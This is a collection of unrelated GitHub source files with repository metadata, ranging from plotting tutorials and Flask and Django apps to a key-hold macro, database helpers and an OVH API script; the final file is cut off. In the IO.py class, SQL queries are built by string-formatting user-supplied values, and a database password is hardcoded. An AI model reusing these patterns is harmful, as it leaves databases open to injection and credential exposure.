30217438684
|
import seaborn as sns
import matplotlib.pyplot as plt
#%matplotlib inline
tips = sns.load_dataset('tips')
fluege = sns.load_dataset('flights')
###Matrixplots###
#Heatmap
#Damit die Heatmap gut funktioniert sollten eure Daten bereits in Matrixform vorliegen. Die sns.heatmatp() übernimmt dann die Einfärbung dieser Daten
# Matrix der Korrelationsdaten
tips.corr() #corr Funktion erkennt automatisch numerische Spalten & lässt kategorische Spalten weg.
sns.heatmap(tips.corr()) #Ausführen der Heatmap aufgrun der Korrelationsverteilung
plt.show()
sns.heatmap(tips.corr(),cmap='coolwarm',annot=True) # cmap: Farbvariante, annot: Korrelationswerte in dem Kästschen
plt.show()
#Erstellung einer Pivottabelle für die Darstellung der Daten in Jahre
pvfluege = fluege.pivot_table(values='passengers',index='month',columns='year') #values: Anzahl der der Passagiere; Index: sind die Zeilen, columns: sind die Spalten
sns.heatmap(pvfluege,cmap='magma',linecolor='white',linewidths=1) # linecolor: lässt eine Unterteilung zu; linewidths: gibt die Linienstärke wieder.
plt.show()
#Clustermap: welche Kategorien(z.B. Monate an dene geflogen werden) liegen beieiander
sns.clustermap(pvfluege,cmap='coolwarm',standard_scale=1) # standard_scale: Dimension für die Zeile oder für die Spalte standardisieren möchten (Subtrahieren von jedem Wert durch Minimum und anschließend Division jedes Wertes durch Maximum
plt.show() # Für Standardisierung von Zeilen 0 und für Spalten 1.
#Regressionsplots:
sns.lmplot(x="total_bill",y="tip", data=tips) # Vergleich von Bill mit Tip bzgl. Korrelation
plt.show()
sns.lmplot(x='total_bill',y='tip',data=tips,hue='sex',palette='coolwarm',#hue: Trennung von kategorischen Parameter
markers=['o','v'], #Veränderung der Symbole
scatter_kws={'s':100}) #scatter_kws: Definition von der Göße der Symbole
plt.show()
sns.lmplot(x='total_bill',y='tip',data=tips, row='time', col='sex') #über row & col können multiple Korrelationsgrafiken erstellt werden.
plt.show()
|
ThePeziBear/MyPythonLibrary
|
Visualizing_Python/Seaborn/2_matrix_regression_function_seaborn.py
|
2_matrix_regression_function_seaborn.py
|
py
| 2,082 |
python
|
de
|
code
| 0 |
github-code
|
6
|
4357761100
|
from flask_wtf import Form
from wtforms import StringField, TextAreaField, SelectField
from wtforms import SubmitField, validators
# from wtforms.ext.sqlalchemy.fields import QuerySelectField
from ..models import Department, Service
class RequestForm(Form):
'''This class creates an RequestForm
object.
'''
name = StringField('Request',
[validators.Required(message='We need an Request.'),
validators.Length(
max=70,
message='Your \subject is a tad long.'
)
]
)
description = TextAreaField('Request Description',
[validators.required(
message='Please describe your Request.')])
priority = SelectField('Priority', choices=[
('high', 'High'), ('medium', 'Medium'), ('low', 'Low')])
department = SelectField('Department',
[validators.Required(
message='Department required.')],
coerce=int)
service = SelectField('Service',
[validators.Required(
message='Service required.')],
coerce=int)
submit = SubmitField('Post Request')
def __init__(self, *args, **kwargs):
super(RequestForm, self).__init__(*args, **kwargs)
self.department.choices = [
(dept.id, dept.name) for dept in Department.query.all()]
self.service.choices = [
(service.id, service.name) for service in Service.query.all()]
class CommentForm(Form):
'''This class creates a CommentForm
object
'''
comment = TextAreaField('Comment')
|
bazanovam/smartIT
|
app/request/forms.py
|
forms.py
|
py
| 1,819 |
python
|
en
|
code
| 0 |
github-code
|
6
|
71602794748
|
#
#
# Key-Holding-Macro made by JngVedere
# Github : https://github.com/JngVedere
# version 0.1.0 - Released on 03-06-2023
#
#
from tkinter import messagebox, ttk
from tendo import singleton
try:
singleton.SingleInstance()
except SystemExit as e:
messagebox.showerror("ERROR", e)
import tkinter as tk
import pywinauto, XK_TO_DD
import threading
from time import sleep
try:
from KeyHolding import KeyToWindow, getKeyPressing
from KeyHolding import wnd_check_thread
except SystemExit as e:
messagebox.showerror("ERROR",e)
exit(0)
# // Global variables
root:object = tk.Tk()
app:object
app_title:str = "Key Holding Macro"
app_size:tuple = (350,170)
window_info:str = ""
simplified:bool = True
# // GUI
class MainApp:
def __init__(self, master):
global simplified
# Basic Variables
self.master = master
self.key_pressed = False
self.key_to_send = -1
#Frame
self.master.title(app_title)
self.X = int(self.master.winfo_screenwidth()/2 - app_size[0]/2)
self.Y = int(self.master.winfo_screenheight()/2 - app_size[1]/2)
self.master.wm_geometry(f"{app_size[0]}x{app_size[1]}+{self.X}+{self.Y}")
self.master.minsize(250, 150)
self.master.maxsize(700, 220)
self.master.resizable(True,False)
self.master.bind("<Key>", self.key_press)
self.upper_frame = tk.Frame(width=100, relief="sunken",bd=1)
self.upper_frame.pack(side="top",fill="both",padx=5,ipadx=2,pady=5,ipady=2)
self.lower_frame = tk.Frame(width=100, height=110, relief="sunken",bd=1)
self.lower_frame.pack(side="bottom",fill="both",padx=5,ipadx=2,pady=5,ipady=2,expand=True)
self.window_combobox = ttk.Combobox(self.upper_frame, width = 40, postcommand = lambda:self.update_cb_list(simplified), state='readonly')
self.window_combobox.set("Pick a Window")
self.window_combobox.pack(fill="x",padx=3,pady=3,side="top")
self.window_combobox.bind("<<ComboboxSelected>>",self.window_selected)
self.check_var = tk.BooleanVar(value=True)
self.simplified_checkbutton = tk.Checkbutton(self.upper_frame, text='Simplified Window', variable=self.check_var, onvalue=True, offvalue=False, command=self.on_check_button_click)
# self.simplified_checkbutton.bind("<ButtonRelease-1>",self.on_check_button_click)
self.simplified_checkbutton.pack(pady=2)
print(self.check_var.get())
self.show_key = tk.Label(self.lower_frame, text="<Press any key to hold>", bg='gray19', fg='snow')
self.show_key.pack(pady=5)
self.send_button = tk.Button(self.lower_frame, text="Hold Key", command=self.button_pressed, takefocus=False)
self.send_button.pack(pady=3)
self.ro_textbox = ttk.Label(self.lower_frame, text='',border=1,font=("Calibri",12,"bold"))
self.ro_textbox.pack(side="bottom")
def update_cb_list(self, simplified):
print("updt cb list", simplified)
if simplified == True: # Find window by window name
self.temp_list = pywinauto.Desktop(backend='uia').windows(title_re ='.')
self.values_list = [w.window_text() for w in self.temp_list]
else: # Find window by hwnd
self.values_list = []
self.hwnd_list = []
procs = pywinauto.findwindows.find_elements()
for proc in procs:
self.hwnd_list.append(proc.handle)
self.values_list.append((proc.name,proc.class_name))
self.window_combobox['value'] = self.values_list
def on_check_button_click(self):
def update_check_var(): #To Avoid Firing two functional works
print("Button Clicked")
global simplified
simplified = self.check_var.get()
self.window_combobox.set("Pick a Window")
print(self.check_var.get())
self.master.after(30, update_check_var)
def window_selected(self, event):
global window_info
if simplified == True:
window_info = self.window_combobox.get()
elif simplified == False:
window_info = self.hwnd_list[self.window_combobox.current()]
def key_press(self, event):
if self.key_pressed == False:
self.show_key.config(text=event.keysym)
self.key_to_send = XK_TO_DD.XK_TO_DD[str(event.keycode)]
print(repr(event.char), repr(event.keysym), repr(event.keycode), repr(event.keysym_num))
def button_pressed(self):
global window_info
if self.window_combobox.current() == -1:
messagebox.showerror("ERROR", "Window isn't selected")
return
elif self.key_to_send == -1:
messagebox.showerror("ERROR", "Key isn't selected")
return
if not KeyToWindow.is_valid_window_info(window_info): return
print(window_info)
if not self.key_pressed:
self.activate_button()
else:
self.deactivate_button()
def SafeQuit(self, master:object = root) -> None:
if messagebox.askokcancel(f"{app_title} Quit", f"Are you sure that you want to quit {app_title}?"):
if getKeyPressing() == True:
KeyToWindow.send_key_to_window(window_info, self.key_to_send, key_down=False)
print("Events Listening is stopped!")
master.destroy()
def is_input_activating(self):
if getKeyPressing() == True:
self.ro_textbox.config(text='Activating')
else:
self.ro_textbox.config(text='Not Activating')
self.is_hwnd_available()
def is_hwnd_available(self):
global window_info
if not KeyToWindow.is_valid_window_info(window_info):
self.deactivate_button()
def activate_button(self):
global window_info
KeyToWindow.send_key_to_window(window_info, self.key_to_send, key_down=True)
self.key_pressed = True
wnd_check_thread.resume()
key_check_thread.resume()
self.window_combobox.config(state='disabled')
self.simplified_checkbutton.config(state='disabled')
self.ro_textbox.config(text='')
self.send_button.config(text="Release Key")
def deactivate_button(self):
global window_info
KeyToWindow.send_key_to_window(window_info, self.key_to_send, key_down=False)
self.key_pressed = False
wnd_check_thread.pause()
key_check_thread.pause()
self.window_combobox.config(state='normal')
self.simplified_checkbutton.config(state='normal')
self.ro_textbox.config(text='')
self.send_button.config(text="Hold Key")
#// Logics Threading
class MyThread(threading.Thread):
def __init__(self):
super().__init__()
self.pause_event = threading.Event()
self.pause_event.clear()
self.daemon = True
def run(self):
# while not self.pause_event.is_set():
while True:
self.pause_event.wait()
app.is_input_activating()
# Wait for a short time before checking again
sleep(0.1)
def pause(self):
self.pause_event.clear()
def resume(self):
self.pause_event.set()
if __name__ == "__main__":
app = MainApp(root)
key_check_thread = MyThread()
key_check_thread.start()
root.protocol("WM_DELETE_WINDOW", app.SafeQuit)
root.mainloop()
|
JngVedere/Key-Holding-Macro
|
main.py
|
main.py
|
py
| 7,540 |
python
|
en
|
code
| 0 |
github-code
|
6
|
22218753276
|
from director import lcmUtils
from director import transformUtils
import PythonQt
import bot_core as lcmbotcore
from director.simpletimer import SimpleTimer
import numpy as np
class StateListener(object):
def __init__(self):
self.subscriber = None
self.transforms = []
self.timer = SimpleTimer()
self.paused = True
def onBDIPose(self, m):
t = transformUtils.transformFromPose(m.pos, m.orientation)
if self.timer.elapsed() > 1.0:
self.transforms.append((self.timer.now(), t))
self.timer.reset()
def describe(self):
print('----------')
print('%d transforms' % len(self.transforms))
if not self.transforms:
return
time0, transform0 = self.transforms[0]
o0 = np.array(transform0.GetOrientation())
p0 = np.array(transform0.GetPosition())
for timeN, transformN in self.transforms:
oN = np.array(transformN.GetOrientation())
pN = np.array(transformN.GetPosition())
oD = oN - o0
pD = pN - p0
print('%.2f: [%.3f, %.3f, %.3f] [%.3f, %.3f, %.3f] ' % ((timeN - time0), oD[0], oD[1], oD[2], pD[0], pD[1], pD[2]))
def init(self):
self.subscriber = lcmUtils.addSubscriber('POSE_BODY', lcmbotcore.pose_t, self.onBDIPose)
listener = StateListener()
listener.init()
|
RobotLocomotion/director
|
src/python/director/statelistener.py
|
statelistener.py
|
py
| 1,387 |
python
|
en
|
code
| 176 |
github-code
|
6
|
35073881294
|
# helper functions
def format_show_info(show):
empty_placeholder = "—"
star_emoji = "★"
empty_star_emoji = "☆"
text = "_{name} ({start} - {end})_\
\nRating: {rating}\
\nGenres: _{genres}_\
\nRuntime: _{runtime}_\
\nStatus: _{status}_"
name = getattr(show, "name", None)
start = getattr(show, "premiered", None)
end = getattr(getattr(show, "previous_episode", None), "airdate", None)
rating = getattr(show, "rating", {}).get("average")
genres = getattr(show, "genres", None)
runtime = getattr(show, "runtime", None)
status = getattr(show, "status", None)
# some of these could've been done with the getattr call
# but None is an acceptable return value for gettattr
name = name if name else empty_placeholder
start = start[:4] if start else ""
genres = ", ".join(genres) if genres else empty_placeholder
runtime = str(runtime) + " minutes" if runtime else empty_placeholder
status = status if status else empty_placeholder
# only show end if show has ended
if status == "Ended":
end = end[:4]
else:
end = ""
# star rating out of five
if rating:
r = int(rating)//2
rating = star_emoji * r + empty_star_emoji * (5-r)
else:
rating = empty_placeholder
formatted_text = text.format(
name=name,
start=start,
end=end,
rating=rating,
genres=genres,
runtime=runtime,
status=status
)
return formatted_text
|
devanjith/tvtimebot
|
helpers/util.py
|
util.py
|
py
| 1,599 |
python
|
en
|
code
| 0 |
github-code
|
6
|
42667622123
|
from models import db
from flask import Flask, request, jsonify
from bson.json_util import dumps
def getPacientes():
con = db.get_connection()
dbejercicios = con.ModeloEjercicios
try:
pacientes = dbejercicios.pacientes
retorno = dumps(pacientes.find({}))
return jsonify(retorno)
finally:
con.close()
print('coneccion cerrada')
def getListPaciente(parametro='documento'):
con = db.get_connection()
dbejercicios = con.ModeloEjercicios
try:
pacientes = dbejercicios.pacientes
retorno = list(pacientes.find({}))
lista = [d[parametro] for d in retorno]
return jsonify({'data': lista, 'status': 200})
finally:
con.close()
print('coneccion cerrada')
def createPatient(data):
con = db.get_connection()
dbejercicios = con.ModeloEjercicios
try:
pacientes = dbejercicios.pacientes
pacientes.insert(data)
return jsonify({'message': 'paciente insertado', 'status': 200})
except:
return jsonify({'message': 'fallo en la insercion', 'status': 500})
finally:
con.close()
print('coneccion cerrada')
def deletePatientDocument(documento):
con = db.get_connection()
dbejercicios = con.ModeloEjercicios
try:
pacientes = dbejercicios.pacientes
pacientes.delete_many({'documento': documento})
return jsonify({'message': 'paciente eliminado', 'status': 200})
except:
return jsonify({'message': 'fallo al eliminar paciente', 'status': 500})
finally:
con.close()
print('coneccion cerrada')
def editarPaciente(data):
con = db.get_connection()
dbejercicios = con.ModeloEjercicios
try:
pacientes = dbejercicios.pacientes
print(data['data'])
pacientes.find_one_and_update({'documento': data['documento']}, {'$set': data['data']})
return jsonify({'message': 'paciente editado', 'status': 200})
except:
return jsonify({'message': 'fallo al editar un paciente', 'status': 500})
finally:
con.close()
print('coneccion cerrada')
|
andres94091/projectEjerciciosBackend
|
models/pacientes.py
|
pacientes.py
|
py
| 2,139 |
python
|
es
|
code
| 0 |
github-code
|
6
|
42727324036
|
import os
import csv
import numpy as np
import sys
from PIL import Image
class DataBuilder:
def __init__(self, image_dir, label_file, output_dir,output_file, output_label_file, target_size):
self.image_dir = image_dir
self.label_file = label_file
self.target_size = target_size
self.filtered_labels = []
self.output_file = output_file
self.output_label_file = output_label_file
self.output_dir = output_dir
self.labels = []
def filter_labels(self, labels_to_ignore):
# Load the labels from the CSV file and filter out the labels to ignore
with open(self.label_file, 'r') as file:
reader = csv.reader(file)
labels = [row for row in reader]
self.filtered_labels = [label for label in labels if label[2] not in labels_to_ignore]
def process_images(self):
# Create output directory if it doesn't exist
os.makedirs(self.output_dir, exist_ok=True)
# Open the output CSV file
with open(self.output_file, 'w', newline='') as csvfile:
writer = csv.writer(csvfile)
# Iterate through the images in the directory
for image_file in os.listdir(self.image_dir):
if image_file.endswith('.jpg') or image_file.endswith('.png'):
image_path = os.path.join(self.image_dir, image_file)
label = self.get_label(image_file)
if label != None:
self.labels.append(label)
# Load, resize, and convert the image to an array of target size and three channels
image = Image.open(image_path)
image = image.resize(self.target_size)
image_array = np.array(image.convert('RGB'))
# Flatten the image array and append the label
flattened_image = image_array.flatten()
#row = np.concatenate(([label], flattened_image))
# Write the row to the CSV file
writer.writerow(flattened_image)
self.store_labels()
def get_index(self, image_file):
for i in range(len(self.filtered_labels)):
if image_file in self.filtered_labels[i][1]:
return i
return None
def get_label(self, image_file):
# Extract the label from the image file name or file itself
# and return the corresponding label
#We should search for labels ("sad" or "happy") appearing in the image file path (exact match not needed)
#If one of the labels is found, and the third column matches it (i.e. "sad or happy"), then we return the label (0 or 1)
#If no label is found, we return None, which means the image should be ignored
ind = self.get_index(image_file)
if ind is None:
print(f"Image {image_file} not found in labels")
return None
if 'sad' in self.filtered_labels[ind][1] and self.filtered_labels[ind][2] == 'sad':
return 0
elif 'happy' in self.filtered_labels[ind][1] and self.filtered_labels[ind][2] == 'happy':
return 1
else:
print(f"Image {image_file} not found in labels")
return None
def store_labels(self):
# Store the label in a separate file (e.g., CSV or text file)
# Implement your own logic here based on your desired output format
with open(self.output_label_file, 'w', newline='') as csvfile:
writer = csv.writer(csvfile)
for label in self.labels:
writer.writerow(str(label))
# Example usage
builder = DataBuilder(
image_dir='./images',
label_file='./labels/labels.csv',
output_dir='./output',
output_file='./output/output.csv',
output_label_file='./output/output_labels.csv',
target_size=(64, 64) # Example target size, adjust according to your needs
)
# Filter out labels to ignore
labels_to_ignore = ['surprise', 'anger', 'disgust', 'contempt', 'fear', 'neutral'] # Example labels to ignore
builder.filter_labels(labels_to_ignore)
#print(builder.filtered_labels)
#sys.exit()
# Process the images
builder.process_images()
|
maximiliann97/TIF360-project-GIF-emotion-flipper
|
generate_data/DataBuilder.py
|
DataBuilder.py
|
py
| 4,326 |
python
|
en
|
code
| 0 |
github-code
|
6
|
2845548081
|
from django.shortcuts import render
from .models import Directores, Peliculas
def index (request):
directores = Directores.objects.all()
return render(request, 'index.html', context={
'directores': directores,
})
# Capturando la variable ids pasada en la url
# El nombre de la variable debe coincidir con introducido en urls.py
def director (request, ids):
dtor = Directores.objects.filter(id = ids)
foto =''
nombre = ''
apellido = ''
nacimiento= ''
muerte = ''
pais = ''
biografia = ''
peliculas = Peliculas.objects.filter(director = ids)
for director in dtor:
foto = director.foto
nombre = director.nombre
apellido = director.apellido
nacimiento = director.nacimiento
if director.fallecimiento:
muerte = f' † {director.fallecimiento}'
else:
muerte = ''
pais = director.pais
biografia = director.biografia
return render(request, 'Details.html',context={
'nombre': nombre,
'apellido': apellido,
'fechas': f'{nacimiento} {muerte}',
'foto': foto,
'pais': pais,
'bio': biografia,
'peliculas' : peliculas
})
def pelicula (request, ids):
peliculas = Peliculas.objects.filter(id = ids)
# Haciendo un switch para colocar el nombre correcto del género
genero = ''
for peli in peliculas:
if peli.genero == 'c':
genero = 'Comedia'
elif peli.genero == 'f':
genero = 'Ciencia Ficción'
elif peli.genero == 'd':
genero = 'Drama'
elif peli.genero == 't':
genero = 'Terror'
return render(request, 'pelis.html',context={
'peliculas': peliculas,
'genero': genero
})
|
Ranset/django_openbootcamp_exercise12
|
directores/views.py
|
views.py
|
py
| 1,805 |
python
|
es
|
code
| 0 |
github-code
|
6
|
314481349
|
# imports
import os
import numpy as np
import pandas as pd
import pymysql
from pandas.plotting import table
import matplotlib.pyplot as plt
from datetime import datetime
from util.Event import Event
from matplotlib import rc
font = {'family' : 'DejaVu Sans',
'weight' : 'normal',
'size' : 12}
rc('font', **font)
class IO:
def __init__(self, userName):
self.userName = userName
self.mysql = self.dbConnect()
self.events = self.queryUser()
def dbConnect(self):
mysql = pymysql.connect(database ='IOU_DB',
host='localhost',
user='noahf',
password='1')
return mysql
def queryUser(self):
'''
Method to return a list of Event objects with the given userName
'''
# TODO : change this to query the mysql database for the given username
# for now just read in a csv
#eventTable = pd.read_csv(os.path.join(os.getcwd(), 'EVENT_TABLE.csv'))
#eventTableByUser = eventTable[eventTable['UserName'] == self.userName]
query = f'''
SELECT *
FROM EVENT_TABLE
WHERE UserName='{self.userName}'
'''
eventTableByUser = pd.read_sql(query, self.mysql)
eventList = []
for ii, row in eventTableByUser.iterrows():
event = Event(row['UserName'], row['Event'], row['StartTime'], row['EndTime'], row['StartDate'])
eventList.append(event)
print(event)
return eventList
def writeNewEvent(self, table, event, start, end, startDate):
sqlcmd = f"""
INSERT INTO {table} VALUES {(self.userName, event, start, end, startDate)}
"""
print(sqlcmd)
cursor = self.mysql.cursor()
cursor.execute(sqlcmd)
self.mysql.commit()
def removeEvent(self, event, date):
sqlcmd = f"""
DELETE FROM EVENT_TABLE
WHERE UserName = '{self.userName}'
AND Event = '{event}'
AND StartDate = '{date}'
"""
cursor = self.mysql.cursor()
cursor.execute(sqlcmd)
self.mysql.commit()
def queryOweTable(self):
query = f"""
SELECT *
FROM OWE_TABLE
WHERE ower = '{self.userName}'
"""
oweTable = pd.read_sql(query, self.mysql)
print(oweTable)
if len(oweTable) > 0:
fig = plt.figure()
ax = plt.subplot(111, frame_on=False) # no visible frame
ax.xaxis.set_visible(False) # hide the x axis
ax.yaxis.set_visible(False) # hide the y axis
table(ax, oweTable, loc='best')
ax.set_title('Hourly Debt:', fontsize=14) #, pad=25
#fig.subplots_adjust(top=0.2)
return fig
else:
return "You don't have any debt!!"
def queryRequestTable(self):
query = f"""
SELECT *
FROM REQUESTS
WHERE Requestor != '{self.userName}'
"""
reqTable = pd.read_sql(query, self.mysql)
print(reqTable)
if len(reqTable) > 0:
fig = plt.figure()
ax = plt.subplot(111, frame_on=False) # no visible frame
ax.xaxis.set_visible(False) # hide the x axis
ax.yaxis.set_visible(False) # hide the y axis
table(ax, reqTable, loc='best')
ax.set_title('Requests from other Professors:', fontsize=14)
return fig
else:
return "There are no requests"
def addRequest(self, startDate, start, end, eventName):
sqlcmd = f"""
INSERT INTO REQUESTS VALUES {(self.userName, startDate, start, end, eventName)}
"""
print(self.userName, startDate, start, end, eventName)
sqlCheck = f"""
SELECT *
FROM EVENT_TABLE
WHERE UserName='{self.userName}'
AND StartDate='{startDate}'
AND StartTime='{start}'
AND EndTime='{end}'
AND Event='{eventName}'
"""
cursor = self.mysql.cursor()
print(pd.read_sql(sqlCheck, self.mysql))
if len(pd.read_sql(sqlCheck, self.mysql)) == 0:
raise ValueError('Please Enter Values for an existing event')
cursor.execute(sqlcmd)
self.mysql.commit()
def fulfill(self, eventName, eventDate, otherFirst, otherLast):
cursor = self.mysql.cursor()
# get other User name
getOtherUser = f"""
SELECT *
FROM USERNAME
WHERE FirstName='{otherFirst}'
AND LastName='{otherLast}'
"""
userInfo = pd.read_sql(getOtherUser, self.mysql)
otherUser = userInfo['UserName'].tolist()[0]
# first remove request from REQUEST table
sqlcmd = f"""
DELETE FROM REQUESTS
WHERE Requestor = '{otherUser}'
AND EventName = '{eventName}'
AND StartDate = '{eventDate}'
"""
cursor.execute(sqlcmd)
#self.mysql.commit()
# get event hours
eventsQuery = f"""
SELECT *
FROM EVENT_TABLE
WHERE UserName='{otherUser}'
AND Event='{eventName}'
AND StartDate='{eventDate}'
"""
print(eventsQuery)
events = pd.read_sql(eventsQuery, self.mysql)
if len(events) > 1:
raise ValueError('Duplicate Events!!! Exiting...')
print(events)
event = Event(events['UserName'].tolist()[0],
events['Event'].tolist()[0],
events['StartTime'].tolist()[0],
events['EndTime'].tolist()[0],
events['StartDate'].tolist()[0])
eventHrs = event.endTime - event.startTime
eventHrs = eventHrs.total_seconds()/3600 # convert eventHrs to hr float
# change username on the event in EVENT_TABLE
updateCmd = f"""
UPDATE EVENT_TABLE
SET UserName='{self.userName}'
WHERE UserName='{otherUser}'
AND Event='{eventName}'
AND StartDate='{eventDate}'
"""
print()
print("update comm: ", updateCmd)
print()
cursor.execute(updateCmd)
#self.mysql.commit()
# get relevant rows in OWE_TABLE and check figure out if you owe the otherUser
getOwes = f"""
SELECT *
FROM OWE_TABLE
WHERE owes='{otherUser}'
AND ower='{self.userName}'
"""
oweTable = pd.read_sql(getOwes, self.mysql)
if len(oweTable) > 0:
hoursOwed = oweTable['amount'].tolist()[0]
else:
hoursOwed = 0
# now calculate who owes what hours and insert
if hoursOwed - eventHrs == 0:
deleteEvent = f"""
DELETE FROM OWE_TABLE
WHERE ower = '{self.userName}'
AND owes = '{otherUser}'
"""
cursor.execute(deleteEvent)
#self.mysql.commit()
elif hoursOwed - eventHrs < 0:
# first remove old owed hours
deleteEvent = f"""
DELETE FROM OWE_TABLE
WHERE ower = '{self.userName}'
AND owes = '{otherUser}'
"""
cursor.execute(deleteEvent)
#self.mysql.commit()
# then add new row with conjugate
addEvent = f"""
INSERT INTO OWE_TABLE VALUES {(otherUser, self.userName, eventHrs-hoursOwed)}
"""
cursor.execute(addEvent)
#self.mysql.commit()
else:
owesUpdate = f"""
UPDATE OWE_TABLE
SET amount='{hoursOwed-eventHrs}'
WHERE ower='{self.userName}'
AND owes='{otherUser}'
"""
cursor.execute(owesUpdate)
self.mysql.commit()
|
noahfranz13/IOU
|
util/IO.py
|
IO.py
|
py
| 8,566 |
python
|
en
|
code
| 1 |
github-code
|
6
|
41366711164
|
# -*- encoding: utf-8 -*-
import sys, argparse, json, ovh, re, datetime,configparser
from urllib import parse
def main(argv):
parser = argparse.ArgumentParser()
parser.add_argument('--url','-u', help='Url recu par email du type https://www.ovh.com/manager/#/useraccount/contacts/123456?tab=REQUESTS&token=monsupertoken')
args = parser.parse_args()
print(decodeUrl(args.url))
client= ovh.Client()
updateck(client)
idurl = decodeUrl(args.url)["id"]
tokenurl = decodeUrl(args.url)["token"]
#Test if ID is ready to accept
idstatus = client.get('/me/task/contactChange/{}'.format(idurl))
if idstatus["state"] == "validatingByCustomers":
result = client.post('/me/task/contactChange/{}/accept'.format(idurl),token=tokenurl)
print(result)
else:
print("La tache de changeContact : "+str(idurl)+" est en état "+idstatus["state"])
def decodeUrl(url=""):
# Decode the URL for Id and token for contactChange task
result = parse.parse_qs(parse.urlsplit(url).fragment)
id = re.findall('\d+',list(result.keys())[0])[0]
token = result["token"][0]
return({'id': str(id), 'token': str(token)})
def getConsumerKey(client):
#Obtain Consumer Key for script
ck = client.new_consumer_key_request()
ck.add_recursive_rules(ovh.API_READ_WRITE, '/')
validation = ck.request()
print("Please visit %s to authenticate" % validation['validationUrl'])
input("and press Enter to continue...")
# Print nice welcome message
print("Welcome", client.get('/me')['firstname'])
return validation['consumerKey']
def updateck(client):
#Mise à jour de la CK dans le fichier si besoin
config = configparser.ConfigParser()
config.read('ovh.conf')
endpoint = config["default"]["endpoint"]
try:
client.get("/me")
except (ovh.exceptions.NotCredential,ovh.exceptions.InvalidCredential): # Si la clef CK est non valide alors on en recupere une nouvelle
config[endpoint]["consumer_key"]= getConsumerKey(client)
with open('ovh.conf', 'w') as configfile:
config.write(configfile)
except :
print("Erreur non lié à l'autentification de la CK\nVérifier le fichier ovh.conf")
quit
else:
print("Welcome", client.get('/me')['firstname'])
return True
if __name__ == "__main__":
main(sys.argv[1:])
|
FlorianKronos/ovh-api-scripts
|
acceptTranfert.py
|
acceptTranfert.py
|
py
| 2,376 |
python
|
en
|
code
| 0 |
github-code
|
6
|
27731604302
|
import pandas as pd
import numpy as np
import re
class loadCSV(object):
def __init__(self):
dataSet = [i.strip().split(",") for i in open('smileannotationsfinal.csv', 'r', encoding="utf8").readlines()]
for index, val in enumerate(dataSet):
if len(val) > 3:
dataSet[index] = [val[0], ','.join(val[1:len(val) - 1]), val[-1]]
dataSet[index][1] = cleanTweet(dataSet[index][1])
self.tweetDataFrame = pd.DataFrame(dataSet, columns=['ID', 'Tweet', 'Classifiation'])
def cleanTweet(tweet):
tweet = tweet.lower()
#Convert www.* or https?://* to URL
tweet = re.sub('((www\.[^\s]+)|(https?://[^\s]+))','URL',tweet)
#Convert @username to AT_USER
tweet = re.sub('@[^\s]+','AT_USER',tweet)
#Remove additional white spaces
tweet = re.sub('[\s]+', ' ', tweet)
#Replace #word with word
tweet = re.sub(r'#([^\s]+)', r'\1', tweet)
#trim
tweet = tweet.strip('\'"')
return tweet
def main():
csvData = loadCSV()
print(csvData.tweetDataFrame.head())
csvData.tweetDataFrame.to_csv('export.csv', sep=',', encoding='utf-8')
if __name__ == "__main__":
# calling main function
main()
|
thanapol2/twitter_python
|
loadCSV.py
|
loadCSV.py
|
py
| 1,202 |
python
|
en
|
code
| 0 |
github-code
|
6
|
18417538437
|
from typing import List
from functools import lru_cache
class Solution:
def canJump_top_down(self, nums: List[int]) -> bool:
n = len(nums)
@lru_cache(None)
def can_jump(i):
if i < 0 or i >= n:
return False
if i + nums[i] >= n - 1:
return True
return any(can_jump(k) for k in range(i + nums[i], i, -1))
return can_jump(0)
def canJump_greedy(self, nums: List[int]) -> bool:
n = len(nums)
max_jump = 0
for i in range(n):
if max_jump < i:
return False
max_jump = max(max_jump, i + nums[i])
if max_jump >= n - 1:
return True
return max_jump >= n - 1
## TC: O(n)
## SC: O(1)
s = Solution()
print(s.canJump([0]))
print(s.canJump([3,2,1,0,4]))
|
ace-wu/oj
|
leetcode/0055-jump-game.py
|
0055-jump-game.py
|
py
| 850 |
python
|
en
|
code
| 3 |
github-code
|
6
|
17767255083
|
from datetime import datetime
import uuid
class Order():
def __init__(self, order):
self.__dict__ = order
self.id = str(uuid.uuid4())
class RenderDishInfo():
def __init__(self, id, name, shelf, value, isPicked, isDecayed):
self.id = id
self.name = name
self.shelf = shelf
self.value = value
self.isPicked = isPicked
self.isDecayed = isDecayed
|
purifier1990/PythonLearn
|
kitchen/order.py
|
order.py
|
py
| 363 |
python
|
en
|
code
| 1 |
github-code
|
6
|
11779785900
|
from scripts.util import read_supertopics, SuperTopic, get_spottopics, DateFormat, read_temp_dist
from typing import Literal
import numpy as np
import json
from prettytable import PrettyTable
DATASET = 'climate2'
LIMIT = 7000000
DATE_FORMAT: DateFormat = 'monthly'
NORM: Literal['abs', 'col', 'row'] = 'abs'
BOOST = ['raw', # 0
'retweets', # 1
'replies', # 2
'likes', # 3
'retweets_likes', # 4
'replies_likes', # 5
'retweets_replies', # 6
'retweets_likes_replies' # 7
][0]
# SOURCE_DIR = f'data/{DATASET}/topics_big2'
# TWEETS_FILE = f'data/{DATASET}/tweets_filtered_{LIMIT}.jsonl'
# LABELS_FILE = f'{SOURCE_DIR}/labels_{LIMIT}_tsne.npy'
EPS = 1e-12
FILE_SUPERTOPICS = f'data/{DATASET}/topics_big2/supertopics.csv'
# FILE_TEMP_DIST = f'data/{DATASET}/topics_big2/temporal_sampled/{DATE_FORMAT}/temporal_{LIMIT}_{DATE_FORMAT}_{BOOST}_{NORM}.json'
FILE_TEMP_DIST = 'data/climate2/topics_big2/temporal_keep_majority/monthly/temporal_monthly_raw_abs.json'
print(FILE_TEMP_DIST)
groups, topics, distributions = read_temp_dist(FILE_TEMP_DIST)
annotations = read_supertopics(FILE_SUPERTOPICS)
spot_topics = get_spottopics(distributions, threshold=0.4, min_size=500)
# print(topics)
# print(distributions.sum(axis=0))
print(distributions.shape)
print(annotations.shape)
print(spot_topics.shape)
tab = PrettyTable(field_names=['supertopic', 'N topics', 'N spottopics', 'spots/topics',
'N tweets', 'N tweet spot', 'spottweets/tweets', 'avg tweets/topic (std)', 'max peak'])
for st in SuperTopic:
n_topics = annotations[:, st].sum()
n_spots = annotations[:, st][spot_topics].sum()
n_topic_tweets = distributions.T[annotations[:, st] > 0].sum()
mean_tweets_per_topic = distributions.T[annotations[:, st] > 0].mean()
std_tweets_per_topic = distributions.T[annotations[:, st] > 0].std()
n_spot_tweets = distributions.T[spot_topics][annotations[:, st][spot_topics] > 0].sum()
tab.add_row([st.name,
f'{n_topics} ({n_topics / distributions.shape[1]:.1%})',
f'{n_spots} ({n_spots / len(spot_topics):.1%})',
f'{n_spots / n_topics:.2%}',
